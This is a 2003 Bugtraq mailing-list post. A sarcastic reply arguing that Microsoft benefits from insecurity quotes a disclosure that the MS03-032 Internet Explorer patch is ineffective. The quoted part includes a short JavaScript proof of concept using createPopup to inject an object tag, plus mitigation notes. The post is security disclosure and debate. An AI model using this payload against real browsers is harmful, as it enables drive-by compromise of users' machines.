Message-ID: <3F5CEDD7.4040305@gs2.com.br>
From: bugtraq at gs2.com.br (Fabio Gomes de Souza)
Subject: BAD NEWS: Microsoft Security Bulletin MS03-032
Guys,
If Microsoft fixed IE holes, they would destroy the Adware/Spyware industry.
If Microsoft removed the Virus Support (TM) from their products, they
would crash the entire antivirus industry (and this one is not small).
If Microsoft did a decent hotfix management solution, they would destroy
the newly-created hotfix management industry.
If Microsoft managed the open ports of a Windows computer in a decent
manner, Symantec, their friend who sells firewalls, would earn less money.
This list is endless. Too many cats to put in a bag.
Also endless is this issue. Market is the answer. When the market
finally realizes that AT LEAST the OS must be Open Source, these problems
will disappear.
http-equiv@...ite.com wrote:
> Since the cat somehow got out of the bag, and more importantly, this
> is so blatantly obvious, herewith is the "Bad News":
>
> The patch for Drew's object data=funky.hta doesn't work:
>
> http://www.malware.com/badnews.html
>
> <script>
> var oPopup = window.createPopup();
>
> function showPopup() {
> oPopup.document.body.innerHTML = "<object data=ouch.php>";
> oPopup.show(0,0,1,1,document.body);
> }
>
> showPopup()
> </script>
>
> Notes:
>
> 1. Disable Active Scripting
> 2. In case that does not work, uninstall Internet Explorer
> 3. http://www.eeye.com/html/Research/Advisories/AD20030820.html
> 4. This was sent to the manufacturer quite some time prior to this
> going out. Surprisingly no immediate acknowledgement
> 5. This is so blatantly obvious, in particular because it is
> the coupling of two known issues [one current + one from 2002]:
>
> http://www.securityfocus.com/bid/3867/
>
> It is beyond comprehension why this was not checked from the
> outset as it is a known issue plus file://::{CLSID} in the control
> panel in the object tag still functions to date.
> 6. At this stage one must really question the competency of this
> particular operation. This is a pathetic oversight.
>